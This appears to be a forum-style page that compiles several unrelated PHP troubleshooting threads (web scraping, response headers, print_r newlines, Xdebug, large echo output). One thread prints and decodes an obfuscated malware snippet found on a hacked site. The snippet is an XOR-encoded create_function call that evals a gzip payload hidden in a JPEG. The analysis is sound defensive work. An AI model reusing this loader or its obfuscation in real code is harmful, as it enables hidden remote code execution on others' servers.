PHP code scraping a URL suddenly stopped working - php

$url = 'the web address I want to get the first and second numbers close to $' ;
$str = file_get_contents($url);
preg_match_all('/ ([$]) *(\d+(?:[.,]\d+)?)/', $str, $matches, PREG_SET_ORDER);
$i = 0;
foreach ($matches as $val) {
    if ($i == 0) $first = $val[2];
    if ($i == 3) $second = $val[2];
    $i++;
}
$bad_symbols = array(",", ".");
$first = str_replace($bad_symbols, "", $first);
$second = str_replace($bad_symbols, "", $second);
echo $first . "<br>";
echo $second;
It worked fine until yesterday.
What could be the problem?

I see at least two possible explanations:
The HTML of the site has changed; maybe only a little, but enough to get you in trouble.
You could test the return value of preg_match_all.
If it's 0, your regex didn't match anything (false would mean the regex itself failed), which may indicate that the content of the HTML page is no longer the same.
Then you might have to modify your regex.
The admin of the server has banned you (this can also be done in the code generating the page).
Maybe the website has detected that you were scraping it (either because you were hitting their server too hard, or because they saw their content on your site),
and they banned your IP address, for instance.
To detect that, check the return value of file_get_contents; if it's false, the request failed, which might be the cause of the problem.
Can you try fetching that HTML page from your server, using wget on the command line?
A third one, as suggested by others: maybe the configuration of your server has changed, and you can't use file_get_contents over HTTP anymore.
A solution would be to use curl, for instance.
Check the allow_url_fopen directive in your configuration.
If you enable error_reporting, you might also get some information that could prove useful.
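The two return-value checks suggested above could look roughly like the sketch below. The helper names fetchPage and extractDollarAmounts are made up for illustration, and the regex is a simplified assumption rather than the asker's exact pattern.

```php
<?php
// Hypothetical helper: returns every number that directly follows a "$".
// Throws if the regex engine itself fails (preg_match_all returns false).
function extractDollarAmounts(string $html): array
{
    $count = preg_match_all('/\$\s*(\d+(?:[.,]\d+)*)/', $html, $matches);
    if ($count === false) {
        throw new RuntimeException('Regex error code: ' . preg_last_error());
    }
    // $count === 0 means the page was read but nothing matched,
    // which usually points at changed HTML. The result is then [].
    return $matches[1];
}

// Hypothetical helper: fetches a page and turns a failed request
// (file_get_contents returning false) into an exception.
function fetchPage(string $url): string
{
    $html = @file_get_contents($url);
    if ($html === false) {
        $err = error_get_last();
        throw new RuntimeException('Fetch failed: ' . ($err['message'] ?? 'unknown error'));
    }
    return $html;
}

// Usage (the URL is a placeholder):
// $amounts = extractDollarAmounts(fetchPage('http://example.com/prices'));
```

An exception from fetchPage would suggest a ban or a configuration change, while an empty array from extractDollarAmounts would suggest the markup has changed.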

Maybe the system administrator has changed the allow_url_fopen directive, which means file_get_contents() can no longer open URLs, only local files. Check what file_get_contents() returns, because you gave us very little information about the error.
Another problem, as mentioned above, could be that the remote site has changed :)
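One way to check the directive from inside a script, and to fall back to cURL when URL wrappers are disabled, is sketched here. chooseFetchStrategy and fetchWithCurl are hypothetical helper names, and the timeout value is an arbitrary assumption.

```php
<?php
// Hypothetical helper: decide how to fetch a URL given what the server allows.
function chooseFetchStrategy(bool $allowUrlFopen, bool $hasCurl): string
{
    if ($allowUrlFopen) {
        return 'file_get_contents';
    }
    return $hasCurl ? 'curl' : 'none';
}

// Hypothetical helper: fetch with the cURL extension.
// Returns the response body, or false if the request failed.
function fetchWithCurl(string $url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body instead of printing it
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // follow redirects
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);          // give up after 10 seconds (assumed value)
    return curl_exec($ch);
}

// Inspect the current configuration.
$strategy = chooseFetchStrategy(
    filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
    function_exists('curl_init')
);
echo "Would fetch with: $strategy\n";
```

If this reports "none", neither approach is available and the server configuration itself has to change.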

Related

PHP / Apache headers issue where the apache_response_headers function returns truncated header keys with PHP 7 and above

I'm facing a rather weird issue: PHP's apache_response_headers function returns an array of headers whose keys are truncated by one character.
Notes:
I have tested with a bare test.php file containing print_r(apache_response_headers()) and got the same results
the issue disappears as soon as I switch to PHP <= 5.6
I have tested on a few servers with the same results
I have searched all over, but no one seems to have the same issue
Has anyone encountered this in the past?
Is there a way to debug this?
Thanks in advance.
I can confirm that I'm seeing the same issue on Windows, IIS 7.5, PHP 7.0.27. I do not have this issue on Linux, Apache 2.4, PHP 7.0.30.
A pseudo workaround is:
$headers = array();
foreach (headers_list() as $header) {
    $temp = explode(':', $header, 2);
    $headers[$temp[0]] = trim($temp[1]);
}
echo '<pre>';
var_dump($headers);
I'm sure there may be situations that the above hack won't give you what you want, but I am not familiar enough with Apache's headers to know.
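Two situations where the loop above could misbehave are header lines without a colon and headers that appear more than once (Set-Cookie, for instance). A slightly more defensive sketch follows; parseHeaderLines is a hypothetical helper, not a PHP built-in.

```php
<?php
// Hypothetical helper: turns raw "Name: value" lines, such as those
// returned by headers_list(), into an associative array.
function parseHeaderLines(array $lines): array
{
    $headers = [];
    foreach ($lines as $line) {
        $parts = explode(':', $line, 2);
        if (count($parts) < 2) {
            continue; // no colon, so not a "Name: value" line
        }
        $name  = trim($parts[0]);
        $value = trim($parts[1]);
        if (isset($headers[$name])) {
            // Repeated header: collect all values in a list.
            $headers[$name] = array_merge((array) $headers[$name], [$value]);
        } else {
            $headers[$name] = $value;
        }
    }
    return $headers;
}

// Usage: $headers = parseHeaderLines(headers_list());
```

Whether repeated headers should become a list or be joined into one string is a design choice; the list form is used here only because it loses no information.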

Is it possible to change the behavior of PHP's print_r function [duplicate]

This question already has answers here:
making print_r use PHP_EOL
I've been coding in PHP for a long time (15+ years now), and I usually do so on a Windows OS, though most of the time it's for execution on Linux servers. Over the years I've run up against an annoyance that, while not important, has proved to be a bit irritating, and I've gotten to the point where I want to see if I can address it somehow. Here's the problem:
When coding, I often find it useful to output the contents of an array to a text file so that I can view its contents. For example:
$fileArray = file('path/to/file');
$faString = print_r($fileArray, true);
$save = file_put_contents('fileArray.txt', $faString);
Now when I open the file fileArray.txt in Notepad, the contents of the file are all displayed on a single line, rather than the nice, pretty structure seen if the file were opened in Wordpad. This is because, regardless of OS, PHP's print_r function uses \n for newlines, rather than \r\n. I can certainly perform such replacement myself by simply adding just one line of code to make the necessary replacements, and therein lies the problem. That one, single line of extra code translates back through my years into literally hundreds of extra steps that should not be necessary. I'm a lazy coder, and this has become unacceptable.
Currently, on my dev machine, I've got a different sort of work-around in place (shown below), but this has its own set of problems, so I'd like to find a way to "coerce" PHP into putting in the "proper" newline characters without all that extra code. I doubt that this is likely to be possible, but I'll never find out if I never ask, so...
Anyway, my current work-around goes like this. I have, in my PHP include path, a file (print_w.php) which includes the following code:
<?php
function print_w($in, $saveToString = false) {
    $out = print_r($in, true);
    $out = str_replace("\n", "\r\n", $out);
    switch ($saveToString) {
        case true: return $out;
        default: echo $out;
    }
}
?>
I also have auto_prepend_file set to this same file in php.ini, so that it automatically includes it every time PHP executes a script on my dev machine. I then use the function print_w instead of print_r while testing my scripts. This works well, so long as when I upload a script to a remote server I make sure that all references to the function print_w are removed or commented out. If I miss one, I (of course) get a fatal error, which can prove more frustrating than the original problem, but I make it a point to carefully proofread my code prior to uploading, so it's not often an issue.
So after all that rambling, my question is: is there a way to change the behavior of print_r (or similar PHP functions) to use Windows newlines, rather than Linux newlines, on a Windows machine?
Thanks for your time.
OK, after further research, I've found a better work-around that suits my needs and eliminates the need to call a custom function instead of print_r. This new work-around goes like this:
I still have to have an included file (I've kept the same name so as not to have to mess with php.ini), and php.ini still has the auto_prepend_file setting in place, but the code in print_w.php has changed a bit:
<?php
rename_function('print_r', 'print_rw');
function print_r($in, $saveToString = false) {
    $out = print_rw($in, true);
    $out = str_replace("\n", "\r\n", $out);
    switch ($saveToString) {
        case true: return $out;
        default: echo $out;
    }
}
?>
This effectively alters the behavior of the print_r function on my local machine, without my having to call custom functions or make sure that all references to such a custom function are neutralized. By using rename_function (which comes from the APD extension rather than core PHP), I was able to effectively rewrite how print_r behaves, making it possible to address my problem.
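For setups where no function-renaming extension is available, a wrapper built around PHP_EOL is another option. The sketch below is only an illustration; print_r_eol is a hypothetical name. Because it defaults to PHP_EOL, it would emit \r\n on Windows and plain \n on Linux, provided the file defining it is included in both places.

```php
<?php
// Hypothetical helper: like print_r(), but with a configurable line ending.
// Defaults to PHP_EOL, i.e. "\r\n" on Windows and "\n" on Linux.
function print_r_eol($value, bool $return = false, string $eol = PHP_EOL)
{
    // Normalise any existing line ending first so "\r\n" is never doubled.
    $out = preg_replace('/\r\n|\r|\n/', $eol, print_r($value, true));
    if ($return) {
        return $out;
    }
    echo $out;
    return true; // mirrors print_r(), which returns true when it prints
}

// Usage, following the example from the question:
// file_put_contents('fileArray.txt', print_r_eol($fileArray, true));
```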

PHP 302 Redirect virus/hack found, need help to decipher

A client recently came to me with an issue where their website would redirect to different websites against their wishes. The culprit turned out to be the following snippet:
// $wp_ac_remote_retrieve_header = ',S7<f-NH9;%.KM7kF0^L2&1YzYJM.>RB,|Mu"C_#}H2#HEFGKSI 5<K8]M"97Z)GM&FbN%CAKL1/Z:JUOD3!9-!.<B0?9kCNWBQ~~k1U7,7i~&>8<(R<NE<^Zb0>2,EQ]R/SS%wSSD!yN,;"#/T$d/>&b|a^v' ^ "I%VPNm)2PUCB*9RC Y2)mAT-%:%#Z[<6_ToZJ,2%R*^B<1i!*> LL^>K4#GJD9L)9C4L-J.n&5PK7S\$z#-QSX_HKOm`wi.;-2.~.6;t-TI[F-N_JYL}y=&T;(MtYUo*?)3F=6WX;6(Q&<IWCWF;JJ_PA#UHwM";
// $get_ho_tag_template = 'cr atDW"ufb4)j.'|'!"E!`%HDTl#pHoJ';
// $start_hg_wp = $get_ho_tag_template(null,$wp_ac_remote_retrieve_header);
// $start_hg_wp();
And apparently this is not the first time they have been hacked, as I also found the following snippet commented out:
// $comment_zr_date = 'J4UCmj82"&6D?XQz/_F;kB<:#L,FYR<*+vMYS"87tW8OE# B8>LDS=R+ HI<=8S#G5VG#Q;jM^]#5F<(B+5n_DW6L,CX#Nr=h2X:_MKaq-*FOOXH;>^)+FV90%a7qyg^N3*DVQCT7:MvJkKU' ^ '/B4/E*_HKHP(^,4RI6*^4%YN|/C(-7R^X^ov;MUR[0W=!LN$LNc"2P;GY*<OTV6P4V3)44ID.10oX?]L/B[A3-5D-^*=3a"u8w Y:!d19}o>,*4ghV?[N"yv|`Ng!*H7#RM!farz]J*TcBbn';
// $get_spe_footer = "<=:Q.0(CEVO!8=J" ^ "_O_0ZUw%08,UQR\$";
// $wp_olw_rss = $get_spe_footer(null,$comment_zr_date);
// $wp_olw_rss();
There are no other references to any of these functions/variables. Or at least none that turn up when I do a sitewide search. Also, the file's permissions had been changed to read only.
Any idea as to how they are accomplishing this? Or how the above code functions/works? When removed, the issue/hack disappears completely. However, as this is their 3rd time encountering this issue, I believe that they have left themselves open somewhere. As a note, this is not a WP site.
** EDIT
The file was too large to include; here is a link:
http://pastebin.com/1XyJg4S3
If you run this through a base64 decoder, you get:
http://pastebin.com/JMHtqskM
However, I am unable to decipher it any further. There appears to be either more encoding or...?
It's some kind of interesting obfuscation.
echo $comment_zr_date;
gives:
eval(@gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg")));
And
echo $get_spe_footer;
gives:
create_function
The obfuscation works by using bitwise operators on two strings (thanks to Populus for the hint). See also PHP strange bitwise operator impact on strings
In cleartext PHP it says:
$comment_zr_date = 'eval(@gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg")))';
$get_spe_footer = 'create_function';
// execute the function
$wp_olw_rss = $get_spe_footer(null,$comment_zr_date);
$wp_olw_rss();
Further evaluation is possible after you post the contents of
@gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg"))
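To see the string trick in isolation, here is a small sketch that only decodes and prints, and never executes anything. The first pair of operands is copied from the commented-out snippet in the question; $plain and $mask in the second half are made-up values for illustration.

```php
<?php
// XOR-ing two strings in PHP combines them byte by byte.
// These operands come from the $get_spe_footer line in the question.
$decoded = '<=:Q.0(CEVO!8=J' ^ '_O_0ZUw%08,UQR$';
echo $decoded, PHP_EOL; // prints "create_function"

// The same trick in reverse: hide a string behind an arbitrary mask,
// then recover it. XOR with the same mask is its own inverse.
$plain  = 'phpinfo';
$mask   = 'ABCDEFG';       // same length as $plain (hypothetical mask)
$hidden = $plain ^ $mask;  // no longer readable as the original text
$back   = $hidden ^ $mask; // restores the original text
echo $back, PHP_EOL;       // prints "phpinfo"
```

Decoding with echo rather than running the snippet is the safe way to inspect such code, since the decoded string is meant to be passed to eval.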

xdebug is skipping lines while debugging

Using Eclipse/xdebug on Windows 2008 server. Yesterday I was able to successfully debug one PHP file. Today, with a very similar PHP file, it is skipping lines and then going off into oblivion.
Code snippet:
//$data = file_get_contents('php://input');
$data = '[{"ARDivisionNo":"01","CustomerNo":"ABF","ContactCode":"ARTIE JOHN","CustomerName":"American Business Futures","fname":"Artie ","lname":"Johnson","EmailAddress":"philmcintosh#comcast.net","Billing_Address1":"2131 N. 14th Street","Billing_Address2":"Suite 105","Billing_Address3":"Accounting Department","Billing_City":"Irvine","Billing_State":"CA","Billing_Zip":"92618","UDF_FC_ENABLED":"Y","UDF_FC_CUSTOMERID":2.0,"UDF_FC_ADDRESS_BOOK_ID":3.0,"TelephoneNo1":"","FaxNo":""}]';
$json = json_decode($data, true);
Foreach ($json as $i => $row) {
$customers_id = tep_db_prepare_input($row['UDF_FC_CUSTOMERID']);
$customers_firstname = tep_db_prepare_input($row['fname']);
(I pasted in the json for debugging purposes - this worked yesterday in the other file.)
In this file, the first strange thing is the debugger actually stops on the commented out "$data = file_get_contents('php://input');" line.
Then, after the next "$data =" line, it skips to the "$customers_id =" line. At this point $data shows as empty in the variables window.
Any ideas on what is wrong/how to fix?
It is likely that Xdebug sees a different version of the source file than the one you think you are looking at. Are you sure you saved the file before starting to debug?
There are a few cases where Xdebug does skip lines because it doesn't see any breakpoints there. This is because PHP itself doesn't always make that possible, though it mostly happens with if/else statements written without { and }. To find out what is going on, you can create a remote debugging log by adding this to php.ini:
xdebug.remote_log=/tmp/xdebug.log
Xdebug will write all communication packets into this log for you to look at. Perhaps that gives a clue.

Echoing large string in PHP results in no output at all

I am helping to build a Joomla site (using Joomla 1.5.26). One of the pages is really big. As a result, PHP just stops working without any error and all previously printed strings are ignored. There is no output at all. We have display_errors set to TRUE and error_reporting set to E_ALL.
I found the exact line where PHP breaks. It's in libraries/joomla/application/component/view.php:196
function display($tpl = null)
{
    $result = $this->loadTemplate($tpl);
    if (JError::isError($result)) {
        return $result;
    }
    echo $result;
}
Some information:
Replacing echo $result; with echo strlen($result); works. The length of the string is 257759.
echo substr($result, 0, 103396); is printing partial content.
echo substr($result, 0, 103397); results in no output at all.
echo substr($result, 0, 103396) . "A"; results in no output at all. So splitting string into chunks is not a solution.
I have checked server performance during the execution of the script. CPU usage is 100% but there's plenty of memory left. PHP memory limit is 1024M. output_buffering is 4096 but I tried setting it to unreasonably high number - dies at exact same position. Server runs Apache 2.2.14-5ubuntu8.10 and PHP 5.3.2-1ubuntu4.18. PHP runs as fast_cgi module.
I have never experienced anything like this, and a Google search turned up nothing either. Has any of you experienced something like this and found a solution?
Thanks for reading!
Maybe try exploding the string and looping through each line.
You could also try this, found on php.net - echo:
<?php
function echobig($string, $bufferSize = 8192)
{
    // suggest doing a test for Integer & positive bufferSize
    for ($chars = strlen($string) - 1, $start = 0; $start <= $chars; $start += $bufferSize) {
        echo substr($string, $start, $bufferSize);
    }
}
?>
Basically, it seems echo can't handle such large data in one call. Breaking it up somehow should get you where you need to go.
What about trying print_r rather than echo?
function display($tpl = null)
{
    $result = $this->loadTemplate($tpl);
    if (JError::isError($result)) {
        return $result;
    }
    print_r($result);
}
I have tested this on the CLI and it works fine with PHP 5.4.11 and 5.3.15:
$str = '';
for ($i = 0; $i < 257759; $i++) {
    $str .= 'a';
}
echo $str;
It seems a reasonable assumption that PHP itself works fine, but that the output buffer is too large for Apache/fast_cgi. I would investigate the Apache config further. Do you have any special Apache settings?
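A variation on that test, offered only as a sketch, captures the output in a buffer and compares lengths. A match would mean echo handed every byte to PHP's output layer, so any truncation would have to happen further downstream (web server, FastCGI, or the browser's handling of the markup).

```php
<?php
// Build a string of the length reported in the question.
$str = str_repeat('a', 257759);

// Capture what echo emits instead of sending it to the client.
ob_start();
echo $str;
$captured = ob_get_clean();

// Compare what went in with what came out of the buffer.
echo strlen($captured) === strlen($str) ? "echo OK\n" : "echo truncated\n";
```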
May be that?
Try something like this
php_flag output_buffering On
Or try to turn on gzip in Joomla!
Or use nginx as reverse proxy or standalone server :^ )
It seems I solved the problem by myself. The cause was rather unexpected: faulty HTML formatting. We use a template for the order page, and inside it there is a loop which shows all ordered products. When there were only a few products, everything worked great, but when I tried the same with 40 products, the page broke.
However I still don't understand why the server response would be empty with status code 200.
Thanks for answers, everybody!
